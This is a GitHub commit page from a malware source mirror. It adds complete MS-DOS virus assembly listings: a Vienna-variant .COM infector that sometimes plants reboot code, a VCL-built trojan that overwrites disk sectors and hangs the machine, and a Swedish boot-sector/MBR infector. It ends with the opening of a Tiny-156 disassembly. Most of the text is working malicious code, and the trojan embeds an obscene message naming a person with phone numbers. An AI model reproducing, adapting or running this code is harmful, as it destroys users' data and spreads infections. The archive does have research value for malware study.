ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-02-21 22:23:40 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2021-01-12 18:07:35 -06:00 committed by GitHub
parent 6bf46a48b9
commit c227f1121a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
97 changed files with 38998 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

618
MSDOS/Virus.MSDOS.Unknown.v-oneate.asm Normal file
View File

@ -0,0 +1,618 @@
;************************************************************************
; V-ONEATE Virus (Virus: One in Ate)
; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; This is a variant of the Vienna strain which only runs its infectious
; code on an average 1 out of every 8 times it is run. When it is
; run, however, it infects 8 files. This is to make up for the
; slow infection rate. The 62 second flag has been modified for
; 61 seconds. The DOS v1.x checker is removed. Why? Do you
; know anyone who uses DOS v1.x?
;-------------------------------------------------------------------------
MOV_CX MACRO X
DB 0B9H
DW X
ENDM
CODE SEGMENT
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
ORG $+0100H
;*****************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;*****************************************************************************
VCODE: JMP virus
;This was the rest of the original .COM file. Tiny and simple, this time
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
;************************************************************
; The actual virus starts here
;************************************************************
v_start equ $
virus:
;*******************************************************************
; Start of Virus Code: Get current system time
;*******************************************************************
MOV AH,2CH
INT 21H
AND DH,07h ;Last 3 bits 0? (once in eight)
JNZ all_done
;*******************************************************************
; The special "one in eight" infection. If the above line were in
; its original form, this code would be run 1/8 of the time, and
; rather than appending a copy of this virus to the 8 .COM files,
; the virus simply runs the .COM program normally.
; ******************************************************************
PUSH CX
MOV DX,OFFSET vir_dat ;This is where the virus data starts.
; The 2nd and 3rd bytes get modified.
CLD ;Pointers will be auto INcremented
MOV SI,DX ;Access data as offset from SI
ADD SI,first_3 ;Point to original 1st 3 bytes of .COM
MOV DI,OFFSET 100H ;`cause all .COM files start at 100H
MOV CX,3
REPZ MOVSB ;Restore original first 3 bytes of .COM
MOV SI,DX ;Keep SI pointing to the data area
;*************************************************************
; Get DTA address into ES:BX
;*************************************************************
PUSH ES
MOV AH,2FH
INT 21H
;*************************************************************
; Save the DTA address
;*************************************************************
MOV [SI+old_dta],BX
MOV [SI+old_dts],ES ;Save the DTA address
POP ES
;*************************************************************
; Set DTA to point inside the virus data area
;*************************************************************
MOV DX,dta ;Offset of new DTA in virus data area
; NOP ;MASM will add this NOP here
ADD DX,SI ;Compute DTA address
MOV AH,1AH
INT 21H ;Set new DTA to inside our own code
PUSH ES
PUSH SI
MOV ES,DS:2CH
MOV DI,0 ;ES:DI points to environment
JMP ifect
; Here when it's time to close it up & end
; ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
all_done:
PUSH DS
;**********************************************************************
; Restore old DTA
;**********************************************************************
MOV AH,1AH
MOV DX,[SI+old_dta]
MOV DS,[SI+old_dts]
INT 21H
POP DS
;*************************************************************************
; Clear registers used, & do a weird kind of JMP 100. The weirdness comes
; in since the address in a real JMP 100 is an offset, and the offset
; varies from one infected file to the next. By PUSHing an 0100H onto the
; stack, we can RET to address 0100H just as though we JMPed there.
;**********************************************************************
quit:
POP CX
XOR AX,AX
XOR BX,BX
XOR DX,DX
XOR SI,SI
MOV DI,OFFSET 0100H
PUSH DI
XOR DI,DI
RET 0FFFFH
; The Infect Cycle
; ~~~~~~~~~~~~~~~~
ifect: MOV CX,0008h
infect: PUSH CX
CALL theifect
POP CX
LOOP infect
;************************************************************
; Find the "PATH=" string in the environment
;************************************************************
theifect: ; The infection Cycle begins
find_path:
POP SI
PUSH SI ;Get SI back
ADD SI,env_str ;Point to "PATH=" string in data area
LODSB
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long
REPNZ SCASB ;Search for first character
MOV CX,4
;************************************************************
; Loop to check for the next four characters
;************************************************************
check_next_4:
LODSB
SCASB
JNZ find_path ;If not all there, abort & start over
LOOP check_next_4 ;Loop to check the next character
POP SI
POP ES
MOV [SI+path_ad],DI ;Save the address of the PATH
MOV DI,SI
ADD DI,wrk_spc ;File name workspace
MOV BX,SI ;Save a copy of SI
ADD SI,wrk_spc ;Point SI to workspace
MOV DI,SI ;Point DI to workspace
JMP SHORT slash_ok
;**********************************************************
; Look in the PATH for more subdirectories, if any
;**********************************************************
set_subdir:
CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended?
JNZ found_subdir ;If not, there are more subdirectories
JMP all_done ;Else, we're all done
;**********************************************************
; Here if there are more subdirectories in the path
;**********************************************************
found_subdir:
PUSH DS
PUSH SI
MOV DS,ES:2CH ;DS points to environment segment
MOV DI,SI
MOV SI,ES:[DI+path_ad] ;SI = PATH address
ADD DI,wrk_spc ;DI points to file name workspace
;***********************************************************
; Move subdirectory name into file name workspace
;***********************************************************
move_subdir:
LODSB ;Get character
CMP AL,';' ;Is it a ';' delimiter?
JZ moved_one ;Yes, found another subdirectory
CMP AL,0 ;End of PATH string?
JZ moved_last_one ;Yes
STOSB ;Save PATH marker into [DI]
JMP SHORT move_subdir
;******************************************************************
; Mark the fact that we're looking through the final subdirectory
;******************************************************************
moved_last_one:
MOV SI,0
;******************************************************************
; Here after we've moved a subdirectory
;******************************************************************
moved_one:
POP BX ;Pointer to virus data area
POP DS ;Restore DS
MOV [BX+path_ad],SI ;Address of next subdirectory
NOP
;******************************************************************
; Make sure subdirectory ends in a "\"
;******************************************************************
CMP CH,'\' ;Ends with "\"?
JZ slash_ok ;If yes
MOV AL,'\' ;Add one, if not
STOSB
;******************************************************************
; Here after we know there's a backslash at end of subdir
;******************************************************************
slash_ok:
MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace
MOV SI,BX ;Restore SI
ADD SI,f_spec ;Point to "*.COM"
MOV CX,6
REPZ MOVSB ;Move "*.COM",0 to workspace
MOV SI,BX
;*******************************************************************
; Find first string matching *.COM
;*******************************************************************
MOV AH,4EH
MOV DX,wrk_spc
; NOP ;MASM will add this NOP here
ADD DX,SI ;DX points to "*.COM" in workspace
MOV CX,3 ;Attributes of Read Only or Hidden OK
INT 21H
JMP SHORT find_first
;*******************************************************************
; Find next ASCIIZ string matching *.COM
;*******************************************************************
find_next:
MOV AH,4FH
INT 21H
find_first:
JNB found_file ;Jump if we found it
JMP SHORT set_subdir ;Otherwise, get another subdirectory
;*******************************************************************
; Here when we find a file
;*******************************************************************
found_file:
MOV AX,[SI+dta_tim] ;Get time from DTA
AND AL,1FH ;Mask to remove all but seconds
CMP AL,1EH ;61 seconds -> already infected
JZ find_next ;If so, go find another file
CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long?
JA find_next ;If too long, find another one
CMP WORD PTR [SI+dta_len],0AH ;Is it too short?
JB find_next ;Then go find another one
MOV DI,[SI+nam_ptr] ;DI points to file name
PUSH SI ;Save SI
ADD SI,dta_nam ;Point SI to file name
;********************************************************************
; Move the name to the end of the path
;********************************************************************
more_chars:
LODSB
STOSB
CMP AL,0
JNZ more_chars ;Move characters until we find a 00
;********************************************************************
; Get File Attributes
;********************************************************************
POP SI
MOV AX,OFFSET 4300H
MOV DX,wrk_spc ;Point to \path\name in workspace
; NOP ;MASM will add this NOP here
ADD DX,SI
INT 21H
MOV [SI+old_att],CX ;Save the old attributes
;********************************************************************
; Rewrite the attributes to allow writing to the file
;********************************************************************
MOV AX,OFFSET 4301H ;Set attributes
AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird)
MOV DX,wrk_spc ;Offset of \path\name in workspace
; NOP ;MASM will add this NOP here
ADD DX,SI ;Point to \path\name
INT 21H
;********************************************************************
; Open Read/Write channel to the file
;********************************************************************
MOV AX,OFFSET 3D02H ;Read/Write
MOV DX,wrk_spc ;Offset to \path\name in workspace
; NOP ;MASM will add this NOP here
ADD DX,SI ;Point to \path\name
INT 21H
JNB opened_ok ;If file was opened OK
JMP fix_attr ;If it failed, restore the attributes
;*******************************************************************
; Get the file date & time
;*******************************************************************
opened_ok:
MOV BX,AX
MOV AX,OFFSET 5700H
INT 21H
MOV [SI+old_tim],CX ;Save file time
MOV [SI+ol_date],DX ;Save the date
;*******************************************************************
; Get current system time
;*******************************************************************
MOV AH,2CH
INT 21H
AND DH,7 ;Last 3 bits 0? (once in eight)
JNZ seven_in_eight
;*******************************************************************
; The special "one in eight" infection. If the above line were in
; its original form, this code would be run 1/8 of the time, and
; rather than appending a copy of this virus to the .COM file, the
; file would get 5 bytes of code that reboot the system when the
; .COM file is run.
;*******************************************************************
MOV AH,40H ;Write to file
MOV CX,5 ;Five bytes
MOV DX,SI
ADD DX,reboot ;Offset of reboot code in data area
INT 21H
JMP SHORT fix_time_stamp
NOP
;******************************************************************
; Here's where we infect a .COM file with this virus
;******************************************************************
seven_in_eight:
MOV AH,3FH
MOV CX,3
MOV DX,first_3
; NOP ;MASM will add this NOP here
ADD DX,SI
INT 21H ;Save first 3 bytes into the data area
JB fix_time_stamp ;Quit, if read failed
CMP AX,3 ;Were we able to read all 3 bytes?
JNZ fix_time_stamp ;Quit, if not
;******************************************************************
; Move file pointer to end of file
;******************************************************************
MOV AX,OFFSET 4202H
MOV CX,0
MOV DX,0
INT 21H
JB fix_time_stamp ;Quit, if it didn't work
MOV CX,AX ;DX:AX (long int) = file size
SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here)
MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction
ADD CX,OFFSET c_len_y
MOV DI,SI ;Point DI to virus data area
SUB DI,OFFSET c_len_x
;Point DI to reference vir_dat, at start of pgm
MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm
;*******************************************************************
; Write virus code to file
;*******************************************************************
MOV AH,40H
MOV_CX virlen ;Length of virus, in bytes
MOV DX,SI
SUB DX,OFFSET codelen ;Length of virus code, gives starting
; address of virus code in memory
INT 21H
JB fix_time_stamp ;Jump if error
CMP AX,OFFSET virlen ;All bytes written?
JNZ fix_time_stamp ;Jump if error
;**********************************************************************
; Move file pointer to beginning of the file
;**********************************************************************
MOV AX,OFFSET 4200H
MOV CX,0
MOV DX,0
INT 21H
JB fix_time_stamp ;Jump if error
;**********************************************************************
; Write the 3 byte JMP at the start of the file
;**********************************************************************
MOV AH,40H
MOV CX,3
MOV DX,SI ;Virus data area
ADD DX,jmp_op ;Point to the reconstructed JMP
INT 21H
;**********************************************************************
; Restore old file date & time, with seconds modified to 62
;**********************************************************************
fix_time_stamp:
MOV DX,[SI+ol_date] ;Old file date
MOV CX,[SI+old_tim] ;Old file time
AND CX,OFFSET 0FFE0H
OR CX,1EH ;Seconds = 31/30 min = 61 seconds
MOV AX,OFFSET 5701H
INT 21H
;**********************************************************************
; Close File
;**********************************************************************
MOV AH,3EH
INT 21H
;**********************************************************************
; Restore Old File Attributes
;**********************************************************************
fix_attr:
MOV AX,OFFSET 4301H
MOV CX,[SI+old_att] ;Old Attributes
MOV DX,wrk_spc
; NOP ;MASM will add this NOP
ADD DX,SI ;DX points to \path\name in workspace
INT 21H
RET
; End of Infection loop
; ^^^^^^^^^^^^^^^^^^^^^
;************************************************************************
;The virus data starts here. It's accessed off the SI register, per the
; comments as shown
;************************************************************************
vir_dat EQU $
;Use this with (SI + old_dta)
olddta_ DW 0 ;Old DTA offset
;Use this with (SI + old_dts)
olddts_ DW 0 ;Old DTA segment
;Use this with (SI + old_tim)
oldtim_ DW 0 ;Old Time
;Use this with (SI + ol_date)
oldate_ DW 0 ;Old date
;Use this with (SI + old_att)
oldatt_ DW 0 ;Old file attributes
;Here's where the first three bytes of the original .COM file go.(SI + first_3)
first3_ EQU $
INT 20H
NOP
;Here's where the new JMP instruction is worked out
;Use this with (SI + jmp_op)
jmpop_ DB 0E9H ;Start of JMP instruction
;Use this with (SI + jmp_dsp)
jmpdsp_ DW 0 ;The displacement part
;This is the type of file we're looking to infect. (SI + f_spec)
fspec_ DB '*.COM',0
;Use this with (SI + path_ad)
pathad_ DW 0 ;Path address
;Use this with (SI + nam_ptr)
namptr_ DW 0 ;Pointer to start of file name
;Use this with (SI + env_str)
envstr_ DB 'PATH=' ;Find this in the environment
;File name workspace (SI + wrk_spc)
wrkspc_ DB 40h dup (0)
;Use this with (SI + dta)
dta_ DB 16h dup (0) ;Temporary DTA goes here
;Use this with (SI + dta_tim)
dtatim_ DW 0,0 ;Time stamp in DTA
;Use this with (SI + dta_len)
dtalen_ DW 0,0 ;File length in the DTA
;Use this with (SI + dta_nam)
dtanam_ DB 0Dh dup (0) ;File name in the DTA
;Use this with (SI + reboot)
reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0
lst_byt EQU $ ;All lines that assemble into code are
; above this one
;*****************************************************************************
;The virus needs to know a few details about its own size and the size of its
; code portion. Let the assembler figure out these sizes automatically.
;*****************************************************************************
virlen = lst_byt - v_start ;Length, in bytes, of the entire virus
codelen = vir_dat - v_start ;Length of virus code, only
c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code
c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP
;*****************************************************************************
;Because this code is being appended to the end of an executable file, the
; exact address of its variables cannot be known. All are accessed as offsets
; from SI, which is represented as vir_dat in the below declarations.
;*****************************************************************************
old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset
old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment
old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp
ol_date = oldate_ - vir_dat ;Displacement to old file date stamp
old_att = oldatt_ - vir_dat ;Displacement to old attributes
first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM
jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode
jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP
f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string
path_ad = pathad_ - vir_dat ;Displacement to the path address
nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer
env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string
wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace
dta = dta_ - vir_dat ;Displacement to the temporary DTA
dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA
dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA
dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA
reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code
CODE ENDS
END VCODE

132
MSDOS/Virus.MSDOS.Unknown.vir20.asm Normal file
View File

@ -0,0 +1,132 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 10 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : VCLMIKES.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Ron Toler, 2:283/718 (06 Nov 94 16:27)
;* To : Viral Doctor
;* Subj : VCLMIKES.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
; MIKESICA.ASM -- Mike Sica v1.0
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Digital Justice
virus_type equ 3 ; Trojan Horse
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov ah,0Fh ; BIOS get video mode function
int 010h
xor ah,ah ; BIOS set video mode function
int 010h
mov dx,0045h ; First argument is 69
push es ; Save ES
mov ax,040h ; Set extra segment to 040h
mov es,ax ; (ROM BIOS)
mov word ptr es:[013h],dx ; Store new RAM ammount
pop es ; Restore ES
mov si,0001h ; First argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl si,1 ; Convert to word index
mov word ptr [si + 0407h],0 ; Zero LPT port address
pop es ; Restore ES
mov si,0001h ; First argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl si,1 ; Convert to word index
mov word ptr [si + 03FEh],0 ; Zero COM port address
pop es ; Restore ES
mov ax,0002h ; First argument is 2
mov cx,0064h ; Second argument is 100
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
trash_loop: int 026h ; DOS absolute write interrupt
dec ax ; Select the previous disk
cmp ax,-1 ; Have we gone too far?
jne trash_loop ; If not, repeat with new drive
sti ; Restore interrupts
cli ; Clear the interrupt flag
hlt ; HaLT the computer
jmp short $ ; Just to make sure
mov cx,0045h ; First argument is 69
jcxz beep_end ; Exit if there are no beeps
mov ax,0E07h ; BIOS display char., BEL
beep_loop: int 010h ; Beep
loop beep_loop ; Beep until --CX = 0
beep_end:
mov ax,04C00h ; DOS terminate function
int 021h
main endp
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "!! Written By Mike Sica !!"
db "I Suck Big Phat Hairy Cocks!!"
db "Call Anytime Phor Good Head:"
db "794-0533 or 794-3626"
db "Both In The 804 Area Code!!"
finish label near
code ends
end main
;-+- GEcho 1.10+
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;/x Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

277
MSDOS/Virus.MSDOS.Unknown.vir21.asm Normal file
View File

@ -0,0 +1,277 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 11 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : SWEDISH.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:28)
;* To : Brad Frazee
;* Subj : SWEDISH.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
;;
; L„gger gamla bootsectorn p† sida 1, sp†r 0, sector 3.
; sida 0, sp†r 0, sector 7 p† HD.
Code Segment
Assume cs:Code
Org 0000h
Main Proc Far
db 0EAh,05h,00h,0C0h,07h
jmp Near Ptr Init ; Hoppa f”rbi variabler och nya int13h
; Variabler
Old13h dd 0 ; Gamla vectorn till diskfunktionerna.
TmpVec dd 0 ; Tempor„r vec. vid „ndring av int 13.
BootPek dw 0003h,0100h
; Slut p† variabler
Int13h Proc Near
push ds
push ax
push bx
cmp dl,00h ; Drive A
jne Exit
cmp ah,02h
jb Exit
cmp ah,04h
ja Exit ; Kolla s† att func. 2-4
sub ax,ax
mov ds,ax
mov bx,043Fh ; Motor status byte.
test Byte Ptr [bx],01h ; Testa om motorn i A: „r p†..
jnz Exit ; Nej,hoppa till gamla int 13h
call Smitta
Exit: pop bx
pop ax
pop ds
jmp [Old13h]
Smitta Proc Near
push cx
push dx
push si
push di
push es
push cs
pop es
push cs
pop ds
mov si,0004h ; Max antal f”rs”k.
Retry: mov ax,0201h ; L„s en sector
mov bx,0200h ; L„s hit.
mov cx,0001h ; Sp†r 0 Sector 1
sub dx,dx ; Sida 0 Drive 0
pushf
call [Old13h] ; L„s in booten.
jnc OK
dec si
jz Slut ; Hoppa ur om fel.
jmp Retry ; F”rs”k max 4 g†nger.
OK: mov si,0200h
sub di,di
cld
lodsw
cmp ax,[di]
jne L2
lodsw
cmp ax,[di+2]
jne L2
jmp Slut
L2: mov ax,0301h ; Skriv en sector.
mov bx,0200h
mov cx,0003h ; Sp†r 0 Sector 3
mov dx,0100h ; Sida 1 Drive 0
pushf
call [Old13h] ; Flytta boot sectorn.
mov ax,0301h
sub bx,bx
mov cx,0001h
sub dx,dx
pushf
call [Old13h] ; Skriv ner viruset till booten.
Slut: pop es
pop di
pop si
pop dx
pop cx
ret
Smitta Endp
Int13h Endp
Init: sub ax,ax
mov ds,ax ; Nollar ds f”r att „ndra vect.
cli
mov ss,ax
mov sp,7C00h
sti ; S„tter upp en ny stack.
push cs
pop es
mov di,Offset Old13h
mov si,004Ch
mov cx,0004h
cld
rep movsb ; Flytta int 13h vectorn.
mov bx,0413h
mov ax,[bx] ; Minnesstorleken till ax.
dec ax
dec ax
mov [bx],ax ; Reservera plats f”r viruset.
mov cl,06h
shl ax,cl
mov es,ax ; Omvandla till segment addres.
mov Word Ptr TmpVec,Offset Int13h
mov Word Ptr TmpVec+2,es
push es
sub ax,ax
mov es,ax
push cs
pop ds
mov si,Offset TmpVec
mov di,004Ch
mov cx,0004h
rep movsb
pop es
sub si,si
mov di,si
mov cx,0200h ; Hela viruset + lite till.
rep movsb
mov ax,Offset Here
push es
push ax
ret ; Hoppa till viruset.
Here: sub ax,ax
int 13h ; <20>terst„ll driven
sub ax,ax
mov es,ax
mov ax,0201h ; L„s en sector funk.
mov bx,7C00h ; Hit laddas booten normalt.
mov cx,BootPek
mov dx,BootPek+2
int 13h
push cs
pop es
mov ax,0201h
mov bx,0200h
mov cx,0001h
mov dx,0080h
int 13h ; L„s in partions tabellen.
jc Over
push cs
pop ds
mov si,0200h
sub di,di
lodsw
cmp ax,[di] ; Kolla om den „r smittad.
jne HdInf
lodsw
cmp ax,[di+2]
jne HdInf
Over: mov BootPek,0003h
mov BootPek+2,0100h
sub bx,bx
push bx
mov bx,7C00h
push bx
ret ; K”r den gamla booten.
HdInf: mov BootPek,0007h
mov BootPek+2,0080h
mov ax,0301h
mov bx,0200h
mov cx,0007h
mov dx,0080h
int 13h ; Flytta orgin. part.tabellen.
jc Over
push cs
pop ds
push cs
pop es
mov si,03BEh
mov di,01BEh
mov cx,0042h
cld
rep movsb ; Kopiera part. data till viruset.
mov ax,0301h
sub bx,bx
mov cx,0001h
mov dx,0080h
int 13h ; Skriv viruset till part. tabellen.
sub ax,ax
mov es,ax ; Kolla om msg:et ska skrivas ut.
test Byte Ptr es:[046Ch],07h
jnz HdInf1
mov si,Offset Txt ; Detta utf”rs bara om man bootar fr†n
cld ; diskett.
Foo1: lodsb
cmp al,00h
je HdInf1
mov ah,0Eh
sub bx,bx
int 10h
jmp Foo1
HdInf1: jmp Over
Slutet Label Byte ; Anv„nds f”r att veta var slutet „r.
Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h
Main Endp
Code Ends
End
;-+- GEcho 1.00
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

214
MSDOS/Virus.MSDOS.Unknown.vir22.asm Normal file
View File

@ -0,0 +1,214 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 12 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_156.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 16:30)
;* To : Graham Allen
;* Subj : TINY_156.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
page ,132
name TINY156
title The 'Tiny' virus, version TINY-156
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-156 ú
; ú Disassembled by Vesselin Bontchev, September 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
